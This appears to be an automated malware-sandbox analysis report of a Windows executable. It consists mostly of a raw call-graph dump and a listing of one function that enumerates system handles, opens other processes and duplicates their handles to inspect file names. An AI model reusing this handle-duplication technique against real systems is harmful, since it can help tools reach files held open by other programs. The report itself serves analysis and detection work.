40278 43afdb 40406 4233ae 11 API calls 40278->40406 40282 43b4b1 40446 423399 11 API calls 40282->40446 40283 43b428 40293 43b462 40283->40293 40442 432b60 16 API calls 40283->40442 40285 43b56c 40288 43b58a 40285->40288 40452 423330 11 API calls 40285->40452 40287 43afee 40407 44081d 163 API calls 40287->40407 40453 440f84 12 API calls 40288->40453 40289 43b4c1 40455 42db80 163 API calls 40289->40455 40443 423330 11 API calls 40293->40443 40295 43b592 40454 43a82f 16 API calls 40295->40454 40298 43b5b4 40456 438c4e 163 API calls 40298->40456 40300 43b5cf 40457 42c02e memset 40300->40457 40302 43b005 40302->40197 40307 43b01f 40302->40307 40408 42d836 163 API calls 40302->40408 40303 43b1ef 40418 4233c5 16 API calls 40303->40418 40305 43b212 40419 423330 11 API calls 40305->40419 40307->40303 40416 423330 11 API calls 40307->40416 40417 42d71d 163 API calls 40307->40417 40309 43b087 40409 4233ae 11 API calls 40309->40409 40310 43add4 40310->40251 40458 438f86 16 API calls 40310->40458 40313 43b22a 40420 42ccb5 11 API calls 40313->40420 40316 43b23f 40421 4233ae 11 API calls 40316->40421 40317 43b10f 40412 423330 11 API calls 40317->40412 40319 43b257 40422 4233ae 11 API calls 40319->40422 40323 43b129 40413 4233ae 11 API calls 40323->40413 40324 43b26e 40423 4233ae 11 API calls 40324->40423 40327 43b09a 40327->40317 40410 42cc15 19 API calls 40327->40410 40411 4233ae 11 API calls 40327->40411 40328 43b282 40424 43a87a 163 API calls 40328->40424 40330 43b13c 40414 440f84 12 API calls 40330->40414 40332 43b29d 40425 423330 11 API calls 40332->40425 40335 43b2af 40338 43b2b8 40335->40338 40339 43b2ce 40335->40339 40336 43b15f 40415 4233ae 11 API calls 40336->40415 40426 4233ae 11 API calls 40338->40426 40427 440f84 12 API calls 40339->40427 40342 43b2c9 40429 4233ae 11 API calls 40342->40429 40343 43b2da 40428 42370b memset memcpy memset 40343->40428 40346 43b2f9 40430 423330 11 API calls 40346->40430 40348 43b30b 40431 423330 11 API calls 40348->40431 40350 43b325 40432 423399 11 API calls 40350->40432 40352 43b332 40433 4233ae 11 API calls 40352->40433 40354 43b354 40434 423399 11 API calls 40354->40434 40356 43b364 40435 43a82f 16 API calls 40356->40435 40358 43b370 40436 42db80 163 API calls 40358->40436 40360 43b380 40437 438c4e 163 API calls 40360->40437 40362 43b39e 40438 423399 11 API calls 40362->40438 40364 43b3ae 40439 43a76c 21 API calls 40364->40439 40366 43b3c3 40440 423399 11 API calls 40366->40440 40368->40189 40369->40192 40370->40190 40372 43a6f5 40371->40372 40378 43a765 40371->40378 40372->40378 40460 42a115 40372->40460 40376 43a73d 40377 42a115 147 API calls 40376->40377 40376->40378 40377->40378 40378->40197 40380 4397fd memset 40378->40380 40379->40199 40380->40206 40381->40197 40382->40221 40383->40210 40384->40214 40385->40211 40386->40215 40387->40219 40388->40223 40389->40225 40390->40228 40391->40235 40392->40234 40393->40239 40394->40310 40395->40232 40396->40240 40397->40243 40398->40244 40399->40244 40400->40254 40401->40257 40402->40261 40403->40265 40404->40271 40405->40278 40406->40287 40407->40302 40408->40309 40409->40327 40410->40327 40411->40327 40412->40323 40413->40330 40414->40336 40415->40307 40416->40307 40417->40307 40418->40305 40419->40313 40420->40316 40421->40319 40422->40324 40423->40328 40424->40332 40425->40335 40426->40342 40427->40343 40428->40342 40429->40346 40430->40348 40431->40350 40432->40352 40433->40354 40434->40356 40435->40358 40436->40360 40437->40362 40438->40364 40439->40366 40440->40310 40441->40283 40442->40293 40443->40272 40444->40276 40445->40282 40446->40289 40447->40268 40448->40266 40449->40273 40450->40274 40451->40285 40452->40288 40453->40295 40454->40289 40455->40298 40456->40300 40457->40310 40458->40251 40459->40197 40461 42a175 40460->40461 40463 42a122 40460->40463 40461->40378 40466 42b13b 147 API calls 40461->40466 40463->40461 40464 42a115 147 API calls 40463->40464 40467 43a174 40463->40467 40491 42a0a8 147 API calls 40463->40491 40464->40463 40466->40376 40481 43a196 40467->40481 40482 43a19e 40467->40482 40468 43a306 40468->40481 40504 4388c4 14 API calls 40468->40504 40471 42a115 147 API calls 40471->40482 40472 415a91 memset 40472->40482 40473 43a642 40473->40481 40508 4169a7 11 API calls 40473->40508 40475 4165ff 11 API calls 40475->40482 40477 43a635 40507 42c02e memset 40477->40507 40481->40463 40482->40468 40482->40471 40482->40472 40482->40475 40482->40481 40492 42ff8c 40482->40492 40500 439504 13 API calls 40482->40500 40501 4312d0 147 API calls 40482->40501 40502 42be4c memcpy memcpy memcpy memset memcpy 40482->40502 40503 43a121 11 API calls 40482->40503 40484 4169a7 11 API calls 40485 43a325 40484->40485 40485->40473 40485->40477 40485->40481 40485->40484 40486 42b5b5 memset memcpy 40485->40486 40487 42bf4c 14 API calls 40485->40487 40490 4165ff 11 API calls 40485->40490 40505 42b63e 14 API calls 40485->40505 40506 42bfcf memcpy 40485->40506 40486->40485 40487->40485 40490->40485 40491->40463 40493 43817e 139 API calls 40492->40493 40494 42ff99 40493->40494 40495 42ffe3 40494->40495 40496 42ffd0 40494->40496 40499 42ff9d 40494->40499 40510 4169a7 11 API calls 40495->40510 40509 4169a7 11 API calls 40496->40509 40499->40482 40500->40482 40501->40482 40502->40482 40503->40482 40504->40485 40505->40485 40506->40485 40507->40473 40508->40481 40509->40499 40510->40499 40532 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37548 4260dd 37604 424251 120 API calls 37548->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37548 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 FindCloseChangeNotification 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 37798->37765 37799->37767 37800->37769 37801->37771 37802->37733 37805 43811f 37803->37805 37804 438164 37804->37781 37805->37804 37808 437e5e 37805->37808 37831 4300e8 memset memset memcpy 37805->37831 37832 437d3c 37808->37832 37810 437eb3 37810->37805 37811 437ea9 37811->37810 37816 437f22 37811->37816 37847 41f432 37811->37847 37814 437f06 37897 415c56 11 API calls 37814->37897 37818 437f7f 37816->37818 37898 432d4e 37816->37898 37817 437f95 37902 415c56 11 API calls 37817->37902 37818->37817 37820 43802b 37818->37820 37858 4165ff 37820->37858 37822 437fa3 37822->37810 37905 41f638 104 API calls 37822->37905 37827 43806b 37829 438094 37827->37829 37903 42f50e 138 API calls 37827->37903 37829->37822 37904 4300e8 memset memset memcpy 37829->37904 37831->37805 37833 437d69 37832->37833 37836 437d80 37832->37836 37918 437ccb 11 API calls 37833->37918 37835 437d76 37835->37811 37836->37835 37837 437da3 37836->37837 37838 437d90 37836->37838 37906 438460 37837->37906 37838->37835 37922 437ccb 11 API calls 37838->37922 37841 437de8 37921 424f26 123 API calls 37841->37921 37843 437dcb 37843->37841 37919 444283 13 API calls 37843->37919 37845 437dfc 37920 437ccb 11 API calls 37845->37920 37848 41f54d 37847->37848 37852 41f44f 37847->37852 37849 41f466 37848->37849 38093 41c635 memset memset 37848->38093 37849->37814 37849->37816 37852->37849 37856 41f50b 37852->37856 38064 41f1a5 37852->38064 38089 41c06f memcmp 37852->38089 38090 41f3b1 90 API calls 37852->38090 38091 41f398 86 API calls 37852->38091 37856->37848 37856->37849 38092 41c295 86 API calls 37856->38092 37859 4165a0 11 API calls 37858->37859 37860 41660d 37859->37860 37861 437371 37860->37861 37862 41703f 11 API calls 37861->37862 37863 437399 37862->37863 37864 43739d 37863->37864 37866 4373ac 37863->37866 38202 4446ea 11 API calls 37864->38202 37867 416935 16 API calls 37866->37867 37883 4373ca 37867->37883 37868 437584 37870 4375bc 37868->37870 38209 42453e 123 API calls 37868->38209 37869 438460 134 API calls 37869->37883 37872 415c7d 16 API calls 37870->37872 37873 4375d2 37872->37873 37877 4373a7 37873->37877 38210 4442e6 37873->38210 37876 4375e2 37876->37877 38217 444283 13 API calls 37876->38217 37877->37827 37879 415a91 memset 37879->37883 37882 43758f 38208 42453e 123 API calls 37882->38208 37883->37868 37883->37869 37883->37879 37883->37882 37896 437d3c 135 API calls 37883->37896 38184 4251c4 37883->38184 38203 425433 13 API calls 37883->38203 38204 425413 17 API calls 37883->38204 38205 42533e 16 API calls 37883->38205 38206 42538f 16 API calls 37883->38206 38207 42453e 123 API calls 37883->38207 37886 4375f4 37890 437620 37886->37890 37891 43760b 37886->37891 37888 43759f 37889 416935 16 API calls 37888->37889 37889->37868 37892 416935 16 API calls 37890->37892 38218 444283 13 API calls 37891->38218 37892->37877 37895 437612 memcpy 37895->37877 37896->37883 37897->37810 37899 432d65 37898->37899 37900 432d58 37898->37900 37899->37818 38293 432cc4 memset memset memcpy 37900->38293 37902->37822 37903->37829 37904->37822 37905->37810 37923 41703f 37906->37923 37908 43847a 37909 43848a 37908->37909 37910 43847e 37908->37910 37930 438270 37909->37930 37960 4446ea 11 API calls 37910->37960 37914 438488 37914->37843 37916 4384bb 37917 438270 134 API calls 37916->37917 37917->37914 37918->37835 37919->37845 37920->37841 37921->37835 37922->37835 37924 417044 37923->37924 37925 41705c 37923->37925 37929 417055 37924->37929 37962 416760 11 API calls 37924->37962 37926 417075 37925->37926 37963 41707a 11 API calls 37925->37963 37926->37908 37929->37908 37931 415a91 memset 37930->37931 37932 43828d 37931->37932 37933 438297 37932->37933 37934 438341 37932->37934 37936 4382d6 37932->37936 37935 415c7d 16 API calls 37933->37935 37964 44358f 37934->37964 37938 438458 37935->37938 37939 4382fb 37936->37939 37940 4382db 37936->37940 37938->37914 37961 424f26 123 API calls 37938->37961 38007 415c23 memcpy 37939->38007 37995 416935 37940->37995 37943 438305 37947 44358f 19 API calls 37943->37947 37949 438318 37943->37949 37944 4382e9 38003 415c7d 37944->38003 37946 438373 37952 438383 37946->37952 38008 4300e8 memset memset memcpy 37946->38008 37947->37949 37949->37946 37990 43819e 37949->37990 37951 4383cd 37953 4383f5 37951->37953 38010 42453e 123 API calls 37951->38010 37952->37951 38009 415c23 memcpy 37952->38009 37956 438404 37953->37956 37957 43841c 37953->37957 37959 416935 16 API calls 37956->37959 37958 416935 16 API calls 37957->37958 37958->37933 37959->37933 37960->37914 37961->37916 37962->37929 37963->37924 37965 4435be 37964->37965 37966 44360c 37965->37966 37968 443676 37965->37968 37971 4436ce 37965->37971 37975 44366c 37965->37975 38011 442ff8 37965->38011 37966->37949 37967 443758 37980 443775 37967->37980 38020 441409 memset 37967->38020 37968->37967 37970 443737 37968->37970 37972 442ff8 19 API calls 37968->37972 37973 442ff8 19 API calls 37970->37973 37977 4165ff 11 API calls 37971->37977 37972->37970 37973->37967 38019 4169a7 11 API calls 37975->38019 37976 4437be 37981 4437de 37976->37981 38022 416760 11 API calls 37976->38022 37977->37968 37980->37976 38021 415c56 11 API calls 37980->38021 37984 443801 37981->37984 38023 42463b memset memcpy 37981->38023 37983 443826 38025 43bd08 memset 37983->38025 37984->37983 38024 43024d memset 37984->38024 37988 443837 37988->37966 38026 43024d memset 37988->38026 37991 438246 37990->37991 37993 4381ba 37990->37993 37991->37946 37992 41f432 110 API calls 37992->37993 37993->37991 37993->37992 38042 41f638 104 API calls 37993->38042 37996 41693e 37995->37996 37999 41698e 37995->37999 37997 41694c 37996->37997 38043 422fd1 memset 37996->38043 37997->37999 38044 4165a0 37997->38044 37999->37944 38004 415c81 38003->38004 38005 415c9c 38003->38005 38004->38005 38006 416935 16 API calls 38004->38006 38005->37933 38006->38005 38007->37943 38008->37952 38009->37951 38010->37953 38012 442ffe 38011->38012 38013 443094 38012->38013 38016 443092 38012->38016 38027 4414ff 38012->38027 38039 4169a7 11 API calls 38012->38039 38040 441325 memset 38012->38040 38041 4414a9 12 API calls 38013->38041 38016->37965 38019->37968 38020->37967 38021->37976 38022->37981 38023->37984 38024->37983 38025->37988 38026->37988 38028 441539 38027->38028 38029 441547 38027->38029 38028->38029 38030 441575 38028->38030 38031 441582 38028->38031 38032 4418e2 38029->38032 38038 442bd4 38029->38038 38034 42fccf 18 API calls 38030->38034 38033 43275a 12 API calls 38031->38033 38035 4414a9 12 API calls 38032->38035 38036 4418ea 38032->38036 38033->38029 38034->38029 38035->38036 38036->38012 38037 441409 memset 38037->38038 38038->38036 38038->38037 38039->38012 38040->38012 38041->38016 38042->37993 38043->37997 38050 415cfe 38044->38050 38049 422b84 15 API calls 38049->37999 38051 41628e 38050->38051 38056 415d23 __aullrem __aulldvrm 38050->38056 38058 416520 38051->38058 38052 4163ca 38053 416422 10 API calls 38052->38053 38053->38051 38054 416172 memset 38054->38056 38055 416422 10 API calls 38055->38056 38056->38051 38056->38052 38056->38054 38056->38055 38057 415cb9 10 API calls 38056->38057 38057->38056 38059 416527 38058->38059 38063 416574 38058->38063 38060 415700 10 API calls 38059->38060 38061 416544 38059->38061 38059->38063 38060->38061 38062 416561 memcpy 38061->38062 38061->38063 38062->38063 38063->37999 38063->38049 38094 41bc3b 38064->38094 38067 41edad 86 API calls 38068 41f1cb 38067->38068 38069 41f1f5 memcmp 38068->38069 38070 41f20e 38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38123 4446ce 11 API calls 38080->38123 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38097 41bd61 38096->38097 38096->38103 38107 41bc8d 38096->38107 38124 41baf0 55 API calls 38096->38124 38099 41be45 38097->38099 38133 41a25f memset 38097->38133 38099->38067 38099->38074 38101 41be04 38131 41aee4 56 API calls 38101->38131 38103->38097 38132 41ae17 34 API calls 38103->38132 38104 41bd42 38104->38097 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38097 38107->38104 38109 41bd18 38107->38109 38125 4151e3 38107->38125 38108->38101 38111 41bdfd 38108->38111 38109->38097 38109->38104 38129 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38129 38110 41bdcc 38110->38097 38110->38108 38130 41a1b0 memset 38111->38130 38117->38110 38118->38079 38120 41b1e4 38119->38120 38122 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38120->38122 38183 41a1b0 memset 38120->38183 38122->38074 38123->38072 38124->38107 38134 41837f 38125->38134 38128 444706 11 API calls 38128->38109 38129->38104 38130->38101 38131->38103 38132->38097 38133->38099 38135 4183c1 38134->38135 38138 4183ca 38134->38138 38181 418197 25 API calls 38135->38181 38139 4151f9 38138->38139 38155 418160 38138->38155 38139->38109 38139->38128 38140 4183e5 38140->38139 38164 41739b 38140->38164 38143 418444 CreateFileW 38145 418477 38143->38145 38144 41845f CreateFileA 38144->38145 38146 4184c2 memset 38145->38146 38147 41847e GetLastError ??3@YAXPAX 38145->38147 38167 418758 38146->38167 38148 4184b5 38147->38148 38149 418497 38147->38149 38182 444706 11 API calls 38148->38182 38151 41837f 49 API calls 38149->38151 38151->38139 38156 41739b GetVersionExW 38155->38156 38157 418165 38156->38157 38159 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38157->38159 38160 418178 38159->38160 38161 41817f 38160->38161 38162 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38160->38162 38161->38140 38163 418188 ??3@YAXPAX 38162->38163 38163->38140 38165 4173d6 38164->38165 38166 4173ad GetVersionExW 38164->38166 38165->38143 38165->38144 38166->38165 38168 418680 43 API calls 38167->38168 38169 418782 38168->38169 38170 418160 11 API calls 38169->38170 38172 418506 ??3@YAXPAX 38169->38172 38171 418799 38170->38171 38171->38172 38173 41739b GetVersionExW 38171->38173 38172->38139 38174 4187a7 38173->38174 38175 4187da 38174->38175 38176 4187ad GetDiskFreeSpaceW 38174->38176 38178 4187ec GetDiskFreeSpaceA 38175->38178 38180 4187e8 38175->38180 38179 418800 ??3@YAXPAX 38176->38179 38178->38179 38179->38172 38180->38178 38181->38138 38182->38139 38183->38122 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37883 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 38202->37877 38203->37883 38204->37883 38205->37883 38206->37883 38207->37883 38208->37888 38209->37870 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37876 38216 444300 38216->37876 38217->37886 38218->37895 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38252 4256f1 38241->38252 38269 4259c2 38241->38269 38242 429ac1 38268 425ad6 38242->38268 38290 415c56 11 API calls 38242->38290 38247 4260dd 38285 424251 120 API calls 38247->38285 38251 429a4d 38254 429a66 38251->38254 38255 429a9b 38251->38255 38252->38242 38252->38251 38253 422aeb memset memcpy memcpy 38252->38253 38257 4260a1 38252->38257 38266 4259da 38252->38266 38252->38269 38272 425a38 38252->38272 38274 4227f0 memset memcpy 38252->38274 38275 422b84 15 API calls 38252->38275 38276 422b5d memset memcpy memcpy 38252->38276 38277 422640 13 API calls 38252->38277 38279 4241fc 11 API calls 38252->38279 38280 42413a 90 API calls 38252->38280 38253->38252 38286 415c56 11 API calls 38254->38286 38259 429a96 38255->38259 38288 416760 11 API calls 38255->38288 38283 415c56 11 API calls 38257->38283 38289 424251 120 API calls 38259->38289 38262 429a7a 38287 416760 11 API calls 38262->38287 38284 416760 11 API calls 38266->38284 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38252 38275->38252 38276->38252 38277->38252 38278->38266 38279->38252 38280->38252 38281->38272 38282->38272 38283->38266 38284->38247 38285->38268 38286->38262 38287->38259 38288->38259 38289->38242 38290->38266 38291->38213 38292->38216 38293->37899 40171 4147f3 40174 414561 40171->40174 40173 414813 40175 41456d 40174->40175 40176 41457f GetPrivateProfileIntW 40174->40176 40179 4143f1 memset _itow WritePrivateProfileStringW 40175->40179 40176->40173 40178 41457a 40178->40173 40179->40178

                    Executed Functions

                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                    APIs
                    • memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • _wcsicmp.MSVCRT ref: 0040DEB2
                    • _wcsicmp.MSVCRT ref: 0040DEC5
                    • _wcsicmp.MSVCRT ref: 0040DED8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                    • memset.MSVCRT ref: 0040DF5F
